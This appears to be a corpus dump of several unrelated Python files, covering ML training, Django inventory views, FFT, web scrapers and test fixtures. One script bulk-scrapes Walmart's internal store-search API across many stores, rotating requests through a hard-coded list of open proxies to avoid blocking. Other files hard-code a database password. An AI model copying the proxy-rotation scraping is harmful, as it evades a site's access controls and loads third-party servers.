trainer = Trainer(
model, train_loader, test_loader, criterion, optimizer, summary_writer,
DEVICE, args.checkpoint_path, args.checkpoint_frequency
)
trainer.train(
args.epochs,
args.val_frequency,
print_frequency=args.print_frequency,
log_frequency=args.log_frequency,
)
summary_writer.close()
def get_summary_writer_log_dir(args: argparse.Namespace) -> str:
"""Get a unique directory that hasn't been logged to before for use with a TB
SummaryWriter.
Args:
args: CLI Arguments
Returns:
Subdirectory of log_dir with unique subdirectory name to prevent multiple runs
from getting logged to the same TB log directory (which you can't easily
untangle in TB).
"""
tb_log_dir_prefix = f'CNN_bn_mode={args.mode}_dropout={args.dropout}_bs={args.batch_size}_lr={args.learning_rate}_run_'
i = 0
while i < 1000:
tb_log_dir = args.log_dir / (tb_log_dir_prefix + str(i))
if not tb_log_dir.exists():
return str(tb_log_dir)
i += 1
return str(tb_log_dir)
if __name__ == "__main__":
main(parser.parse_args())
|
21,509 | 92de645c3d39328a78a690eccd4a2feb76122dd0 | import os
from datetime import datetime
import logging
import Constants
import sys
def setup_logging():
# Setup logging
os.makedirs(Constants.LOGS_DIR, exist_ok=True)
now = datetime.now()
date_time = now.strftime("%Y-%m-%d %H-%M-%S")
logger = logging.getLogger()
handler = logging.FileHandler(
mode="w", filename=Constants.LOGS_DIR + "/" + date_time + ".txt")
handler.setLevel(logging.INFO)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
return logger
|
21,510 | 7eceb96a94ab46be217c6aa2c4deeaedd89b97b0 | import numpy as np
x = np.array([1, 2, 3])
print(x)
y = np.array([2, 4, 6])
print(x + y)
print(x * y)
print(x / y)
# z = np.array([100, 200])
# print(x + z) #要素数が異なるのでエラー
|
21,511 | 2dfb36c204ddcb565fde01b98f35bd06bbcbf31b | # -*- coding: utf-8 -*-
__author__ = 'lundberg'
# -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.http import HttpResponse, Http404
from django.shortcuts import get_object_or_404, render, redirect
from django.conf import settings
from re import escape as re_escape
import json
from apps.noclook.models import NodeHandle, NodeType
from apps.noclook import arborgraph
from apps.noclook import helpers
import norduniclient as nc
def index(request):
return render(request, 'noclook/index.html', {})
@login_required
def logout_page(request):
"""
Log users out and redirects them to the index.
"""
logout(request)
return redirect('/')
# Visualization views
@login_required
def visualize_json(request, handle_id):
"""
Creates a JSON representation of the node and the adjacent nodes.
This JSON data is then used by Arbor.js (http://arborjs.org/) to make
a visual representation.
"""
# Get the node
nh = NodeHandle.objects.get(pk=handle_id)
root_node = nc.get_node_model(nc.graphdb.manager, nh.handle_id)
if root_node:
# Create the data JSON structure needed
graph_dict = arborgraph.create_generic_graph(root_node)
jsonstr = arborgraph.get_json(graph_dict)
else:
jsonstr = '{}'
return HttpResponse(jsonstr, content_type='application/json')
@login_required
def visualize(request, slug, handle_id):
"""
Visualize view with JS that loads JSON data.
"""
nh = get_object_or_404(NodeHandle, pk=handle_id)
node = nh.get_node()
return render(request, 'noclook/visualize/visualize.html', {'node_handle': nh, 'node': node, 'slug': slug})
@login_required
def visualize_maximize(request, slug, handle_id):
"""
Visualize view with JS that loads JSON data.
"""
nh = get_object_or_404(NodeHandle, pk=handle_id)
node = nh.get_node()
return render(request, 'noclook/visualize/visualize_maximize.html',
{'node_handle': nh, 'node': node, 'slug': slug})
# Search views
@login_required
def search(request, value='', form=None):
"""
Search through nodes either from a POSTed search query or through an
URL like /slug/key/value/ or /slug/value/.
"""
result = []
posted = False
if request.POST:
value = request.POST.get('q', '')
posted = True
if value:
query = u'(?i).*{}.*'.format(re_escape(value))
# nodes = nc.search_nodes_by_value(nc.graphdb.manager, query)
# TODO: when search uses the above go back to that
q = """
match (n:Node) where any(prop in keys(n) where n[prop] =~ $search) return n
"""
nodes = nc.query_to_list(nc.graphdb.manager, q, search=query)
if form == 'csv':
return helpers.dicts_to_csv_response([n['n'] for n in nodes])
elif form == 'xls':
return helpers.dicts_to_xls_response([n['n'] for n in nodes])
for node in nodes:
nh = get_object_or_404(NodeHandle, pk=node['n']['handle_id'])
item = {'node': node['n'], 'nh': nh}
result.append(item)
if len(result) == 1:
return redirect(result[0]['nh'].get_absolute_url())
return render(request, 'noclook/search_result.html', {'value': value, 'result': result, 'posted': posted})
@login_required
def search_autocomplete(request):
"""
Search through a pre determined index for *[query]* and returns JSON data
like below.
{
query:'Li',
suggestions:['Liberia','Liechtenstein','Lithuania'],
data:['LR','LY','LI','LT']
}
"""
response = HttpResponse(content_type='application/json')
query = request.GET.get('query', None)
if query:
try:
suggestions = []
for node in nc.get_indexed_node(nc.graphdb.manager, 'name', query):
suggestions.append(node['name'])
d = {'query': query, 'suggestions': suggestions, 'data': []}
json.dump(d, response)
except Exception:
pass
return response
return False
def regex_escape(_in):
if type(_in) is list:
return map(regex_escape, _in)
return re_escape(_in)
@login_required
def search_port_typeahead(request):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
try:
# TODO: check if size(nodes(p))/size(path) in neo4j>=4.4 is equivalent to length(nodes(p))/length(path) in neo4j==3.5
q = """
MATCH (port:Port)<-[:Has]-(n:Node)
OPTIONAL MATCH (n)-[:Located_in]->(n2:Node)
OPTIONAL MATCH p = () - [:Has * 0..20]->(n2)
WITH COLLECT(nodes(p)) as paths, MAX(size(nodes(p))) AS maxLength,
port.handle_id AS handle_id, n.handle_id AS parent_id,
port.name AS port_name, n.name AS node_name
WITH [path IN paths WHERE size(path) = maxLength] AS longestPaths,
handle_id AS handle_id, parent_id AS parent_id, port_name AS port_name, node_name AS node_name
UNWIND(longestPaths) AS location_path
WITH REDUCE(s = "", n IN location_path | s + n.name + " ") + node_name + " " + port_name AS name, handle_id, parent_id
WHERE name =~ $name_re
RETURN name, handle_id, parent_id
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, name_re=name_re)
except Exception as e:
raise e
json.dump(result, response)
return response
@login_required
def search_location_typeahead(request):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
try:
# find all has relations to the top
q = """
MATCH p = (:Location) - [:Has * 0..20]-> (l:Location)
WITH COLLECT(nodes(p)) as paths, MAX(size(nodes(p))) AS maxLength, l.handle_id as handle_id
WITH [path IN paths WHERE size(path) = maxLength | path ] AS longestPaths, handle_id as handle_id
UNWIND(longestPaths) AS location_path
WITH REDUCE(s = "", n IN location_path | s + n.name + " ") AS name, handle_id
WHERE name =~ $name_re
RETURN name, handle_id
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, name_re=name_re)
except Exception as e:
raise e
json.dump(result, response)
return response
@login_required
def search_non_location_typeahead(request):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
try:
q = """
MATCH (n:Node)
WHERE not n:Location
OPTIONAL MATCH (n)<-[:Has]-(e:Node)
WITH n.handle_id as handle_id,
coalesce(e.name, "") + " "+ n.name as name,
labels(n) as labels
WHERE name =~ $name_re
RETURN handle_id, trim(name) as name, labels ORDER BY name
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, name_re=name_re)
except Exception as e:
raise e
for r in result:
_type = [l for l in r['labels'] if l not in ['Node', 'Physical', 'Logical', 'Relation']]
if _type:
r['name'] = u'{} [{}]'.format(r['name'], _type[0])
# TODO: do stuff with labels
json.dump(result, response)
return response
@login_required
def typeahead_slugs(request, slug='Node'):
response = HttpResponse(content_type='application/json')
to_find = request.GET.get('query', None)
result = []
if to_find:
# split for search
match_q = regex_escape(to_find.split())
labels = [helpers.slug_to_node_type(s).get_label() for s in slug.split('+')]
try:
q = """
MATCH (n:Node)
WHERE any(label in labels(n) where label in $labels)
OPTIONAL MATCH (n)<-[:Has]-(e:Node)
WITH n.handle_id as handle_id,
coalesce(e.name, "") + " "+ n.name as name,
labels(n) as labels
WHERE name =~ $name_re
RETURN handle_id, trim(name) as name, labels ORDER BY name
"""
name_re = '(?i).*{}.*'.format('.*'.join(match_q))
result = nc.query_to_list(nc.graphdb.manager, q, labels=labels, name_re=name_re)
except Exception as e:
raise e
if '+' in slug:
for r in result:
_type = [lab for lab in r['labels'] if lab not in ['Node', 'Physical', 'Logical', 'Relation']]
if _type:
r['name'] = u'{} [{}]'.format(r['name'], _type[0])
json.dump(result, response)
return response
@login_required
def find_all(request, slug=None, key=None, value=None, form=None):
"""
Search through nodes either from a POSTed search query or through an
URL like /slug/key/value/, /slug/value/ /key/value/, /value/ or /key/.
"""
label = None
node_type = None
if request.POST:
value = request.POST.get('q', '') # search for '' if blank
if slug:
try:
node_type = get_object_or_404(NodeType, slug=slug)
label = node_type.get_label()
except Http404:
return render(request, 'noclook/search_result.html',
{'node_type': slug, 'key': key, 'value': value, 'result': None,
'node_meta_type': None})
if value:
nodes = nc.search_nodes_by_value(nc.graphdb.manager, value, key, label)
else:
nodes = nc.get_nodes_by_type(nc.graphdb.manager, label)
if form == 'csv':
return helpers.dicts_to_csv_response(list(nodes))
elif form == 'xls':
return helpers.dicts_to_xls_response(list(nodes))
result = []
for node in nodes:
nh = get_object_or_404(NodeHandle, pk=node['handle_id'])
item = {'node': node, 'nh': nh}
result.append(item)
return render(request, 'noclook/search_result.html',
{'node_type': node_type, 'key': key, 'value': value, 'result': result})
# Google maps views
@login_required
def gmaps(request, slug):
api_key = settings.GOOGLE_MAPS_API_KEY
return render(request, 'noclook/google_maps.html', {'slug': slug, 'maps_api_key': api_key})
@login_required
def gmaps_json(request, slug):
"""
Directs gmap json requests to the right view.
"""
gmap_views = {
'sites': gmaps_sites,
'optical-nodes': gmaps_optical_nodes
}
try:
return gmap_views[slug](request)
except KeyError:
raise Http404
@login_required
def gmaps_sites(request):
"""
Return a json object with node dicts.
{
nodes: [
{
name: '',
url: '',
lng: 0.0,
lat: 0.0
},
],
edges: []
}
"""
sites = nc.get_nodes_by_type(nc.graphdb.manager, 'Site')
site_list = []
for site in sites:
try:
site = {
'name': site['name'],
'url': helpers.get_node_url(site['handle_id']),
'lng': float(str(site.get('longitude', 0))),
'lat': float(str(site.get('latitude', 0)))
}
except KeyError:
continue
site_list.append(site)
response = HttpResponse(content_type='application/json')
json.dump({'nodes': site_list, 'edges': []}, response)
return response
@login_required
def gmaps_optical_nodes(request):
"""
Return a json object with dicts of optical node and cables.
{
nodes: [
{
name: '',
url: '',
lng: 0.0,
lat: 0.0
},
],
edges: [
{
name: '',
url: '',
end_points: [{lng: 0.0, lat: 0.0,},]
}
]
"""
# Cypher query to get all cables with cable type fiber that are connected
# to two optical node.
q = """
MATCH (cable:Cable)
WHERE cable.cable_type = "Dark Fiber"
MATCH (cable)-[Connected_to]->(port)
WITH cable, port
MATCH (port)<-[:Has*0..]-(equipment)
WHERE (equipment:Optical_Node) AND NOT equipment.type =~ "(?i).*tss.*"
WITH cable, port, equipment
MATCH p2=(equipment)-[:Located_in]->()<-[:Has*0..]-(loc)
WHERE (loc:Site)
RETURN cable, equipment, loc
"""
result = nc.query_to_list(nc.graphdb.manager, q)
nodes = {}
edges = {}
for item in result:
node = {
'name': item['equipment']['name'],
'url': helpers.get_node_url(item['equipment']['handle_id']),
'lng': float(str(item['loc'].get('longitude', 0))),
'lat': float(str(item['loc'].get('latitude', 0)))
}
coords = {
'lng': float(str(item['loc'].get('longitude', 0))),
'lat': float(str(item['loc'].get('latitude', 0)))
}
edge = {
'name': item['cable']['name'],
'url': helpers.get_node_url(item['cable']['handle_id']),
'end_points': [coords]
}
nodes[item['equipment']['name']] = node
if item['cable']['name'] in edges:
edges[item['cable']['name']]['end_points'].append(coords)
else:
edges[item['cable']['name']] = edge
response = HttpResponse(content_type='application/json')
json.dump({'nodes': list(nodes.values()), 'edges': list(edges.values())}, response)
return response
@login_required
def qr_lookup(request, name):
hits = list(nc.get_nodes_by_name(nc.graphdb.manager, name))
if len(hits) == 1:
nh = get_object_or_404(NodeHandle, pk=hits[0]['handle_id'])
return redirect(nh.get_absolute_url())
return render(request, 'noclook/qr_result.html', {'hits': hits, 'name': name})
@login_required
def ip_address_lookup(request):
if request.POST:
ip_address = request.POST.get('ip_address', None)
if ip_address:
hostname = helpers.get_hostname_from_address(ip_address)
return HttpResponse(json.dumps(hostname), content_type='application/json')
raise Http404
@login_required
def json_table_to_file(request):
if request.POST:
file_format = request.POST.get('format', None)
data = request.POST.get('data', None)
header = request.POST.get('header', None)
table = json.loads(data)
header = json.loads(header)
if table and file_format == 'csv':
return helpers.dicts_to_csv_response(table, header)
elif table and file_format == 'xls':
return helpers.dicts_to_xls_response(table, header)
raise Http404
|
21,512 | 7243b3624847ff3cfd9a8400a9c50eb9e83ca74b | import pytest
from sklearn.tree import DecisionTreeClassifier
from primrose.configuration.configuration import Configuration
from primrose.readers.dill_reader import DillReader
from primrose.data_object import DataObject, DataObjectResponseType
def test_init_ok():
try:
import sklearn.tree.tree
model_filename = "test/tinymodel.dill"
except ModuleNotFoundError:
model_filename = "test/tinymodel_skl_0_24.dill"
config = {
"implementation_config": {
"reader_config": {
"dill_reader": {
"class": "DillReader",
"filename": model_filename,
"destinations": [],
}
}
}
}
configuration = Configuration(
config_location=None, is_dict_config=True, dict_config=config
)
data_object = DataObject(configuration)
reader = DillReader(configuration, "dill_reader")
data_object, terminate = reader.run(data_object)
assert not terminate
data = data_object.get("dill_reader", rtype=DataObjectResponseType.VALUE.value)
assert data is not None
assert set(data.keys()) == {"test", "model"}
node_config = {
"class": "DillReader",
"filename": model_filename,
"destinations": [],
}
assert isinstance(DillReader.necessary_config(node_config), set)
assert len(DillReader.necessary_config(node_config)) > 0
assert data["test"] == [1, 2, 3]
assert isinstance(data["model"], DecisionTreeClassifier)
|
21,513 | 127918c17891050a9dfa32252a959b1c3d1508b8 | """
Discrete Fast Fourier Transform
"""
import math
from functools import partial
from pyske.core import PList, par
# ------- Fast Fourier Transform ------------
def _bit_complement(index_k: int, index_i: int) -> int:
return index_i ^ (1 << index_k)
def _omega(size: int, log2_size: int, index_j: int, index_i: int) -> complex:
index = index_i >> (log2_size - index_j - 1)
index_2 = 0
for _ in range(0, index_j + 1):
index_2 = 2 * index_2 + 1 if index & 1 else 2 * index_2
index >>= 1
value = 2.0 * math.pi / size * (index_2 << (log2_size - index_j - 1))
return complex(math.cos(value), math.sin(value))
def _combine(size: int, log2_size: int, index_j: int,
index_i: int, complex_1: complex, complex_2: complex) -> complex:
# pylint: disable=too-many-arguments
omega_value = _omega(size, log2_size, index_j, index_i)
if index_i & (1 << log2_size - index_j - 1):
return complex_1 + omega_value * complex_2
return complex_2 + omega_value * complex_1
def fft(input_list: PList[float]) -> PList[complex]:
# pylint: disable=unsubscriptable-object
"""
Return the Discrete Fourier Transform.
Examples::
>>> from pyske.core import PList
>>> fft(PList.init(lambda _: 1.0, 128)).to_seq()[0]
(128+0j)
:param input_list: a PySke list of floating point numbers
:return: a parallel list of complex numbers
"""
size = len(input_list)
log2_size = int(math.log2(size))
nprocs = len(par.procs())
log2_nprocs = int(math.log2(nprocs))
assert size == 2 ** log2_size
assert nprocs == 2 ** log2_nprocs
result = input_list.map(complex)
for index_j in range(0, log2_nprocs):
permutation = result.get_partition()\
.permute(partial(_bit_complement, log2_nprocs - index_j - 1))\
.flatten()
result = permutation.map2i(partial(_combine, size, log2_size, index_j), result)
for index_j in range(log2_nprocs, log2_size):
permutation = result.get_partition()\
.map(lambda l: l.permute(partial(_bit_complement, log2_size - index_j - 1)))\
.flatten()
result = permutation.map2i(partial(_combine, size, log2_size, index_j), result)
return result
# -------------- Execution --------------
def _is_power_of_2(num: int) -> bool:
return num == 2 ** (math.log2(num))
def _main():
import gc
from pyske.core import Timing
from pyske.examples.list import util
size, num_iter, _ = util.standard_parse_command_line(data_arg=False)
assert _is_power_of_2(size), "The size should be a power of 2."
assert _is_power_of_2(len(par.procs())), "The number of processors should be a power of 2."
input_list = PList.init(lambda _: 1.0, size)
timing = Timing()
gc.disable()
for iteration in range(1, 1 + num_iter):
timing.start()
result = fft(input_list)
timing.stop()
gc.collect()
result = result.to_seq()[0]
util.print_experiment(result, timing.get(), par.at_root, iteration)
if __name__ == '__main__':
_main()
|
21,514 | 661fbba5611fc689878d4b9294d2cff082570951 | from django.contrib import admin
from tagsapp.models import Tag
# Register your models here.
admin.site.register(Tag)
|
21,515 | d156aefb885ab84d994be81402c0ce42e5e7f980 | from bs4 import BeautifulSoup
import pandas
import time
from selenium import webdriver
url = 'http://w3.sbs.co.kr/tv/tvsectionMainImg.do?pgmCtg=T&pgmSct=DR&pgmSort=week&div=pc_drama'
driver = webdriver.Firefox()
driver.get(url)
source_code = driver.page_source
soup = BeautifulSoup(source_code, 'lxml')
title_list = list()
broad_list = list()
type_list = list()
for link in soup.find_all('strong', {'class': 'smdpb_tit'}):
link = link.contents
title_list.append(link[0])
broad_list.append("SBS")
type_list.append("drama")
driver.find_element_by_link_text("종영 프로그램").click()
source_code = driver.page_source
soup = BeautifulSoup(source_code, 'lxml')
for link in soup.find_all('strong', {'class': 'smdpb_tit'}):
link = link.contents
title_list.append(link[0])
broad_list.append("SBS")
type_list.append("drama")
drama_title = pandas.DataFrame({'Broadcaster' : broad_list,'title' : title_list,'type' : type_list})
f=open("C:/Users/jaehyun/Crawling/drama_list/SBS.csv","w")
f.write(pandas.DataFrame.to_csv(drama_title))
f.close() |
21,516 | 7b445155345eb6f17e2c74e94e7d41f1b87af400 | import pytest
from rest_framework.test import APIClient
from rest_framework_simplejwt.tokens import RefreshToken
from authentication.models import Dealer
@pytest.fixture
def user():
return Dealer.objects.create_user(
full_name='Leydson Vieira',
cpf='38723274884',
email='leydson.vieira@gmail.com',
password='password'
)
@pytest.fixture
def unlogged_client(user):
client = APIClient()
return client
@pytest.fixture
def logged_client(user):
client = APIClient()
refresh = RefreshToken.for_user(user)
client.credentials(HTTP_AUTHORIZATION=f'Bearer {refresh.access_token}')
return client
|
21,517 | 8ca7405133a55fd5fd61d4313f8bd0c7d119b835 | from behave import when, then, given
import requests
from pydoautomator import Automator
@given(u'droplet {droplet_id:d} exists')
def step_impl(context, droplet_id):
context.droplet_id = droplet_id
full_url = '%s/droplets/%s' % (context.api_uri, context.droplet_id)
response = requests.get(full_url, headers=context.headers)
assert response.status_code == 200, 'response status code is %s' % response.status_code
@when(u'turnoff droplet is called')
def step_impl(context):
aut = Automator(context.token)
aut.turnoff_droplet(context.droplet_id)
@then(u'turnoff droplet')
def step_impl(context):
full_url = '%s/droplets/%s' % (context.api_uri, context.droplet_id)
response = requests.get(full_url, headers=context.headers)
json_resp = response.json()
droplet_status = json_resp['droplet']['status']
assert droplet_status == 'off', 'droplet status is %s! should be off.' % droplet_status
|
21,518 | 94cca0ac76245c7a014dde9c491366c84628fc54 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/4/15 22:20
# @Author : Zheng Xingtao
# @File : z_n_13_复制含有随机指针节点的链表.py
"""
复制含有随机指针节点的链表
【题目】 一种特殊的链表节点类描述如下:
public class Node {
public int value;
public Node next;
public Node rand;
public Node(int data) {
this.value = data;
}
}
Node类中的value是节点值,next指针和正常单链表中next指针的意义一样,都指向下一个节点
rand指针是Node类中新增的指针,这个指针可能指向链表中的任意一个节点,也可能指向null。
给定一个由Node节点类型组成的无环单链表的头节点head,请实现一个函数完成这个链表中所有结构的复制,并返回复制的新链表的头节点。
进阶:
不使用额外的数据结构,只用有限几个变量,且在时间复杂度为O(N)内完成原问题要实现的函数。
""" |
21,519 | 98b3f8cf145b899a12c38fb9bc1bd2942e64ab52 | # Compute w2v based similarity
# Install gensim for this
import sys
import gensim.downloader as api
import numpy as np
from scipy import spatial
from gensim.models import KeyedVectors
# Initialize w2v model
try:
w2v_model = KeyedVectors.load_word2vec_format(
"glove-wiki-gigaword-300-binary", binary=True
)
except:
print("Binary model not present. Loading and saving general model")
w2v_model = api.load("glove-wiki-gigaword-300")
w2v_model.save_word2vec_format("glove-wiki-gigaword-300-binary", binary=True)
def compute_relevance_cost(object_list, term_list):
"""
object_list: a list of objects detected from the image (e.g., ["beaker", "person", "microscope"])
term_list: a list of seaerch terms (e.g., ["biologist", "a person who studies biology"]
"""
object_words = []
term_words = []
for ol in object_list:
ol = ol.strip().replace("_", " ").lower()
for word in ol.split():
if word in w2v_model.key_to_index:
object_words.append(word)
for tl in term_list:
tl = tl.strip().replace("_", " ").lower()
for word in tl.split():
if word in w2v_model.key_to_index:
term_words.append(word)
#print("Printing object_words")
#print(object_words)
#print("Printing term words")
#print(term_words)
relevance_cost = 1 - w2v_model.n_similarity(object_words, term_words)
return relevance_cost
def main():
# Unit test
# objects = ['Person','Human','Advertisement','Poster','Flyer','Brochure','Paper','Reading','Kindergarten']
# terms = ["Primary School Teacher"]#, "a person who studies biology"]
# print (compute_relevance_cost(objects, terms))
terms = ["Biologist"]
filename = sys.argv[1]
file1 = open(filename, "r")
d1 = {}
for line in file1:
line = line.strip()
list1 = line.split(",", 1)
d1[list1[0]] = list1[1].lstrip("[").rstrip("]").split(",")
d2 = dict.fromkeys(d1.keys(), [])
for i in d1.keys():
objects = d1[i]
# print("printing objects in d1 dict")
relevance_cost = compute_relevance_cost(objects, terms)
d2[i] = relevance_cost
# now sort from high to low
sorted_list = sorted(d2.items(), key=lambda x: x[1])
for item in sorted_list:
print(item)
file1.close()
if __name__ == "__main__":
main()
|
21,520 | a23aa2a10edf04c5cd66a4c5bd29d65c9b49e1d6 | # Generated by Django 3.1.4 on 2021-01-17 15:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('common', '0008_auto_20210117_1757'),
]
operations = [
migrations.AlterField(
model_name='address',
name='country',
field=models.CharField(choices=[('BG', 'Bulgaria')], max_length=100),
),
]
|
21,521 | ce49d716d2bbb78697bf29bf15ae16f26d0bc46b | class SliceField():
def __init__(self,field_name,field_style):
self.field_name = field_name
self.field_style = field_style
def get_field_name(self):
return self.field_name |
21,522 | f440a0e816de88791e7790300a2535ca1efcb5b6 | """Кольцо вычетов по модулю."""
class DeductionClassException(Exception):
'''Исключение-обертка для ошибок в использовании классов вычетов.'''
pass
class DeductionClass:
'''Класс вычетов a по модулю m.'''
def __init__(self, a, m):
if not(isinstance(m, int) and m > 1):
raise DeductionClassException(
"Модуль должен быть натуральным числом, большим единицы.")
elif not isinstance(a, int):
raise DeductionClassException(
"Класс вычетов должен быть целым числом.")
else:
self.m = m
self.a = a % m
def __str__(self):
return "["+str(self.a)+"]"+str(self.m)
def __eq__(self, other):
return (self.a == other.a)and(self.m == other.m)
def __add__(self, other):
if not isinstance(other, DeductionClass):
raise DeductionClassException(
"Класс вычетов можно складывать только с классом вычетов.")
if self.m == other.m:
return DeductionClass(self.a + other.a, self.m)
raise DeductionClassException(
"Складывать можно только классы вычетов по одному модулю.")
def __radd__(self, other):
return self + other
def __neg__(self):
return DeductionClass(-self.a, self.m)
def __sub__(self, other):
return self + (-other)
def __mul__(self, other):
if not isinstance(other, DeductionClass):
raise DeductionClassException(
"Класс вычетов можно умножать только на класс вычетов.")
if self.m == other.m:
return DeductionClass(self.a * other.a, self.m)
raise DeductionClassException(
"Перемножать можно только классы вычетов по одному модулю.")
def __rmul__(self, other):
return self * other
|
21,523 | a456e8f2329947d90c60b17cd21a94a2a45a94ed | from datetime import datetime
from flatten_json import flatten
from time import gmtime, strftime
import time
import requests
import os
import json
import sys
import random
import csv
reload(sys)
sys.setdefaultencoding('utf-8')
import threading
proxies = [{'http': '37.151.43.202:3128', 'https': '37.151.43.202:3128'}, {'http': '219.76.4.12:88', 'https': '219.76.4.12:88'}, {'http': '36.55.231.60:3128', 'https': '36.55.231.60:3128'}, {'http': '101.78.238.26:8118', 'https': '101.78.238.26:8118'}, {'http': '178.32.213.128:80', 'https': '178.32.213.128:80'}, {'http': '163.121.188.2:8080', 'https': '163.121.188.2:8080'}, {'http': '188.166.154.140:8118', 'https': '188.166.154.140:8118'}, {'http': '46.101.73.156:8118', 'https': '46.101.73.156:8118'}, {'http': '177.4.173.242:80', 'https': '177.4.173.242:80'}, {'http': '107.20.111.134:80', 'https': '107.20.111.134:80'}, {'http': '51.254.127.194:8081', 'https': '51.254.127.194:8081'}, {'http': '192.129.189.72:9001', 'https': '192.129.189.72:9001'}, {'http': '77.82.87.125:8081', 'https': '77.82.87.125:8081'}, {'http': '188.166.144.158:8118', 'https': '188.166.144.158:8118'}, {'http': '203.74.4.2:80', 'https': '203.74.4.2:80'}, {'http': '51.254.132.238:80', 'https': '51.254.132.238:80'}, {'http': '128.199.191.123:80', 'https': '128.199.191.123:80'}, {'http': '203.74.4.3:80', 'https': '203.74.4.3:80'}, {'http': '203.74.4.6:80', 'https': '203.74.4.6:80'}, {'http': '203.74.4.7:80', 'https': '203.74.4.7:80'}, {'http': '163.121.188.3:8080', 'https': '163.121.188.3:8080'}, {'http': '37.232.247.87:80', 'https': '37.232.247.87:80'}, {'http': '121.58.200.158:80', 'https': '121.58.200.158:80'}, {'http': '149.202.195.236:443', 'https': '149.202.195.236:443'}, {'http': '128.199.74.233:3128', 'https': '128.199.74.233:3128'}, {'http': '46.101.40.241:8118', 'https': '46.101.40.241:8118'}, {'http': '219.76.4.72:88', 'https': '219.76.4.72:88'}, {'http': '203.74.4.0:80', 'https': '203.74.4.0:80'}, {'http': '203.74.4.1:80', 'https': '203.74.4.1:80'}, {'http': '193.70.3.144:80', 'https': '193.70.3.144:80'}, {'http': '197.249.51.253:80', 'https': '197.249.51.253:80'}, {'http': '216.139.71.163:8118', 'https': '216.139.71.163:8118'}, {'http': '139.59.125.77:80', 'https': '139.59.125.77:80'}, {'http': '203.74.4.4:80', 'https': '203.74.4.4:80'}, {'http': '190.211.80.154:80', 'https': '190.211.80.154:80'}]
ListOfStores = []
directory = strftime('%d%b%Y', gmtime())
if not os.path.exists(directory):
os.makedirs(directory)
def GrabFromSpreadsheet(spreadsheet):
with open(spreadsheet, 'r') as f:
reader = csv.reader(f)
your_list = list(reader)
for line in your_list:
if 'Walmart Supercenter' in str(line[1]):
ListOfStores.append(line[0])
GrabFromSpreadsheet("{}/static/Walmarts.csv".format(os.getcwd()))
a = raw_input('\n\n\n\n\nThis Application pulls all Walmart Inventory Information Across {} stores nationwide. Continue? \n\n\n\n\n'.format(len(ListOfStores)))
lis = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '*']
def GrabStore():
StoreChoice = random.choice(ListOfStores)
ListOfStores.remove(StoreChoice)
return str(StoreChoice)
def SaveToCSV(store):
prevsku = len(sku)
keys = sku[0].keys()
with open(directory + str(store) + '.csv', 'wb') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
for s in sku:
data = {key: value for key, value in s.items() if key in keys}
dict_writer.writerow(data)
print(store)
def Fin(searchterm, store):
try:
payload = {"storeId":store,"searchTerm":searchterm,"size":49,"dept":1000,"newIndex":1, 'offset': 0, "query":searchterm,"idx":1}
res = requests.post('https://www.walmart.com/store/electrode/api/search', data=payload, proxies=random.choice(proxies))
Quantity = res.json()['result']['totalCount']
except:
time.sleep(10)
payload = {"storeId":store,"searchTerm":searchterm,"size":49,"dept":1000,"newIndex":1, 'offset': 0, "query":searchterm,"idx":1}
res = requests.post('https://www.walmart.com/store/electrode/api/search', data=payload, proxies=random.choice(proxies))
Quantity = res.json()['result']['totalCount']
af = 0
for i in range(0, int(Quantity), 49):
#print('done')
prevsku = len(sku)
try:
payload = {"storeId":store,"searchTerm":searchterm,"size":49,"dept":1000,"newIndex":1, 'offset': i, "query":searchterm,"idx":1}
res = requests.post('https://www.walmart.com/store/electrode/api/search', data=payload, proxies=random.choice(proxies))
for results in res.json()["result"]['results']:
e = {}
a = flatten(results)
for key, value in a.items() :
key = str(str(key)[::-1].partition('_')[0])[::-1]
e[key] = value
e['atime'] = str(datetime.now())
if str(e['upc']) not in ItemsGrabbed:
sku.append(e)
ItemsGrabbed.append(e['upc'])
print(e["WWWItemId"])
af = 0
else:
af = af + 1
except BaseException as exp:
print(exp)
pass
if af > 1000:
print('broke thread')
break
while len(ListOfStores) > 0:
try:
ItemsGrabbed = []
sku = []
store = str(GrabStore())
threads = [threading.Thread(target=Fin, args=(searchterm, store)) for searchterm in lis]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
SaveToCSV(store)
except BaseException as exp:
print(exp)
pass
|
21,524 | 92431b5ab6d7d8840fe4f497e3eb5d090f912924 | import pymysql
import joblib
import pandas as pd
def linear_prediction(time):
linear = joblib.load("score.pkl")
score_prediction = linear.predict(time)
return score_prediction
class DataBase:
def __init__(self):
self.conn = pymysql.connect(user="root", passwd="000000", db="student_score", host='127.0.0.1')
self.cursor = self.conn.cursor(pymysql.cursors.DictCursor)
def database_select(self):
# database 연결 및 데이터 조회
sql = "SELECT * FROM student_score.score;"
self.cursor.execute(sql)
return pd.DataFrame(self.cursor.fetchall())
def database_insert(self, average, study_time):
sql = """INSERT INTO score(평균, 공부시간) VALUES (%s, %s)"""
db = self.cursor.execute(sql, (average, study_time))
return self.conn.commit()
class AverageLinearRegression:
def __init__(self, korean, english, math, social, science, time):
self.korean = korean
self.english = english
self.math = math
self.social = social
self.science = science
self.time = time
# 총합
def get_sum(self):
return self.korean + self.english +\
self.math + self.social + self.science
# 데이터 저장 및 평균
def data_saving_average(self):
average = self.get_sum() / 5
saving = DataBase().database_insert(average, self.time)
return average
|
21,525 | 3456493a4b7630118723ccd5917e09e915501dca | """Exercise Game Class."""
from ex35_rooms import Rooms
